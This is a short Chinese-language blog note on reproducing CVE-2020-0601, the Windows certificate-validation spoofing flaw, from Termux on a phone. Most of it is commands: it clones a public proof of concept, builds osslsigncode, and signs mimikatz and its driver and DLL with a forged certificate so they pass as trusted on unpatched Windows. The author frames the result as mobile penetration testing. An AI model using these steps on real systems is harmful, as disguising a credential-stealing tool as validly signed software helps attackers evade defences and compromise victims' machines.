Termux笔记:CVE-2020-0601复现
这是一个由美国国安局(NSA)提交的漏洞,出现漏洞的系统是2020年之前的win 10和windows server 2019
准备
基于Termux的乌班图 POC(https://github.com/ollypwn/CVE-2020-0601) 软件包: openssl 1.1.0 ruby 2.4.0 签名工具:signtool.exe(Visual Studio里面集成) 或osslsigncode (Linux 我只在Ubuntu(ARM)上实现过,官方上面写着Ubuntu和Debian都可以)
安装osslsigncode
git clone https://github.com/mtrojnar/osslsigncode.git
安装依赖环境
sudo apt-get update && sudo apt-get install build-essential autoconf libtool libssl-dev python3-pkgconfig libcurl4-gnutls-dev
安装指令
cd osslsigncode
./autogen.sh
./configure
make
make install
操作
git clone https://github.com/ollypwn/CVE-2020-0601.git
下载完成后,按照readme.md上”Code Signing”的命令操作(这次我选择了mimikatz作为测试对象)
cd CVE-2020-0601
"Code Signing"
......
osslsigncode sign -pkcs12 cert.p12 -n "Signed by moz" -in x64/mimikatz.exe -out 1.exe
osslsigncode sign -pkcs12 cert.p12 -n "Signed by moz" -in x64/mimilib.dll -out 1.dll
osslsigncode sign -pkcs12 cert.p12 -n "Signed by moz" -in x64/mimidrv.sys -out 1.sys
生成的文件发到电脑上进行检验 (配图)
总结
乌班图的安装有点费力,不过这个结果我相当满意(不需要电脑就能完成基本渗透)